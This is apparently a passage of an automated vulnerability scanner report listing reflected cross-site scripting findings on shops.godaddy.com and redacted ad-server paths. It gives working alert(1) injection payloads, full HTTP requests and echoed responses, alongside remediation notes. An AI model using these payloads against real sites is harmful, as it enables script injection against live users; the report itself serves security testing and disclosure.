GET /Nicethings-Products-Ptd-Ltd/Insanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset/?isc=GPPT02C021a0893"%3balert(1)//bec5869f8e5&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 167989 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=h0f2ar45fmu15k45r2cwyx2i; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Fri, 19-Nov-2010 23:16:31 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Insanity+60+Day+Total+Body+Conditioning+Program+with+Shaun+T+DVD+Boxset,%2fNicethings-Products-Ptd-Ltd%2fInsanity-60-Day-Total-Body-Conditioning-Program-with-Shaun-T-DVD-Boxset%2f?plv=false,1207707|; expires=Tue, 14-Dec-2010 23:16:31 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021a0893";alert(1)//bec5869f8e5&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548c7"style%3d"x%3aexpression(alert(1))"1201d3f6253 was submitted in the isc parameter. This input was echoed as 548c7"style="x:expression(alert(1))"1201d3f6253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/?isc=GPPT03A092548c7"style%3d"x%3aexpression(alert(1))"1201d3f6253&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 178909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=a01qyinohmtk422uxnodvr2a; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Fri, 19-Nov-2010 23:18:28 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Tue, 14-Dec-2010 23:18:28 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74a28"%3balert(1)//b3dc8509c5b was submitted in the isc parameter. This input was echoed as 74a28";alert(1)//b3dc8509c5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Preferred-Merchandizing/Litter-Lifter-Magic-Scoop/?isc=GPPT03A09274a28"%3balert(1)//b3dc8509c5b&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 176820 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=zqo1j2y3mbtrc4550d0iltyc; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Fri, 19-Nov-2010 23:18:39 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Litter-Lifter%e2%84%a2+++Magic-Scoop%e2%84%a2,%2fPreferred-Merchandizing%2fLitter-Lifter-Magic-Scoop%2f?plv=false,202032|; expires=Tue, 14-Dec-2010 23:18:39 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbcf3"%3balert(1)//480388855c7 was submitted in the isc parameter. This input was echoed as cbcf3";alert(1)//480388855c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/?isc=GPPT03A092cbcf3"%3balert(1)//480388855c7&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 164820 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=w5e2t3bzroyx3rawg4pxmfyb; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Fri, 19-Nov-2010 23:18:25 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Tue, 14-Dec-2010 23:18:25 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4a8"style%3d"x%3aexpression(alert(1))"980abd3216d was submitted in the isc parameter. This input was echoed as 6f4a8"style="x:expression(alert(1))"980abd3216d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /SHOPANNABANANA-COM/THANKSGIVING-CONVERSATION-CARD-GAME/?isc=GPPT03A0926f4a8"style%3d"x%3aexpression(alert(1))"980abd3216d&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 166909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=spld4vjrvvqlpk45xkgyv225; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Fri, 19-Nov-2010 23:18:09 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|THANKSGIVING+CONVERSATION+CARD+GAME,%2fSHOPANNABANANA-COM%2fTHANKSGIVING-CONVERSATION-CARD-GAME%2f?plv=false,593098|; expires=Tue, 14-Dec-2010 23:18:09 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fa1"%3balert(1)//bbdf5b0f8d3 was submitted in the isc parameter. This input was echoed as d7fa1";alert(1)//bbdf5b0f8d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/?isc=GPPT02C021d7fa1"%3balert(1)//bbdf5b0f8d3&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 170462 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=f3pyj4uw1pwofsrxb2krvumr; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Fri, 19-Nov-2010 23:16:29 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Tue, 14-Dec-2010 23:16:29 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021d7fa1";alert(1)//bbdf5b0f8d3&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba487"style%3d"x%3aexpression(alert(1))"d6c6e46d622 was submitted in the isc parameter. This input was echoed as ba487"style="x:expression(alert(1))"d6c6e46d622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /aSavings-com/Leapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green/?isc=GPPT02C021ba487"style%3d"x%3aexpression(alert(1))"d6c6e46d622&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 172551 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=xzmssn55reqvt2f1apzqpvac; path=/; HttpOnly Set-Cookie: mp_RecentlyViewedProducts=Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Fri, 19-Nov-2010 23:16:18 GMT; path=/ Set-Cookie: mp_RecentlyViewedProducts=|Leapfrog+39100+Leapster+Explorer+Learning+Experience+Game+System+Green,%2faSavings-com%2fLeapfrog-39100-Leapster-Explorer-Learning-Experience-Game-System-Green%2f?plv=false,984140|; expires=Tue, 14-Dec-2010 23:16:18 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 515ad"%3balert(1)//30892ae8648 was submitted in the isc parameter. This input was echoed as 515ad";alert(1)//30892ae8648 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.aspx?isc=gppt02C020515ad"%3balert(1)//30892ae8648&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 118708 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=kxbe014523cqbpied14kazzf; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:16:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00 ...[SNIP]... rl_mya="https://mya.godaddy.com/"; var pcj_url_img="http://img5.wsimg.com/"; var pcj_url_cmnty="http://community.godaddy.com/"; var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=gppt02C020515ad";alert(1)//30892ae8648&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005"; var pcj_isMgr = false; var pcj_idpredirect = ""; var pcj_ssoTargetKey = "target"; var pcj_isCart = false; var pcj_isCmnty = false; var pcj_cname = "ShopperId1 ...[SNIP]...
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d36e3"style%3d"x%3aexpression(alert(1))"20c23c02f06 was submitted in the isc parameter. This input was echoed as d36e3"style="x:expression(alert(1))"20c23c02f06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /default.aspx?isc=gppt02C020d36e3"style%3d"x%3aexpression(alert(1))"20c23c02f06&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 120537 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=1w0tpy55z3bwg5iexmwqpt55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:15:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3665c"style%3d"x%3aexpression(alert(1))"045772bf281 was submitted in the isc parameter. This input was echoed as 3665c"style="x:expression(alert(1))"045772bf281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?isc=GPPT03A0923665c"style%3d"x%3aexpression(alert(1))"045772bf281&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 121037 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=krdqygfuv113blzgbteilh55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:18:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73155"%3balert(1)//03aa7f62ae1 was submitted in the isc parameter. This input was echoed as 73155";alert(1)//03aa7f62ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?isc=GPPT03A09273155"%3balert(1)//03aa7f62ae1&domain=sftimes.com HTTP/1.1 Host: shops.godaddy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 119040 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA" Set-Cookie: ASP.NET_SessionId=emalsu551ftnmk2rrtoxsm45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:19:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e28d3'%3bf94cb47b1d6 was submitted in the REST URL parameter 4. This input was echoed as e28d3';f94cb47b1d6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.228. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/AAS/iview/260696261/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5fcf"><script>alert(1)</script>fe6e7202362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.229. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/AAS/iview/260696261/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcad3'-alert(1)-'833bf26ee31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.230. http://redcated/AAS/iview/260696261/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/AAS/iview/260696261/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ecbe"-alert(1)-"2c446c32712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.728;hi.90/01/7275753708?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d002e"-alert(1)-"886a23778e6 was submitted in the wi.728;hi.90/01/7275753708?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.728;hi.90/01/7275753708?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb75b'-alert(1)-'06d8e5580f4 was submitted in the wi.728;hi.90/01/7275753708?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.728;hi.90/01/7275753708?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd419"><script>alert(1)</script>20368711ec5 was submitted in the wi.728;hi.90/01/7275753708?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777f1'%3b37d33a8a9a9 was submitted in the REST URL parameter 4. This input was echoed as 777f1';37d33a8a9a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 241b7</script><script>alert(1)</script>bf2f9eebf88 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a0c'-alert(1)-'0d013425c36 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.237. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/BJ1/iview/214582710/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55351"><script>alert(1)</script>3dcb11dadeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.238. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/BJ1/iview/214582710/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15e5c'-alert(1)-'00018051257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.239. http://redcated/BJ1/iview/214582710/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/BJ1/iview/214582710/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf23"-alert(1)-"a06d375be10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffb8d'%3b283de659ad was submitted in the REST URL parameter 4. This input was echoed as ffb8d';283de659ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33983</script><script>alert(1)</script>1279e68498e was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67974'-alert(1)-'7d4de55c9ba was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.243. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
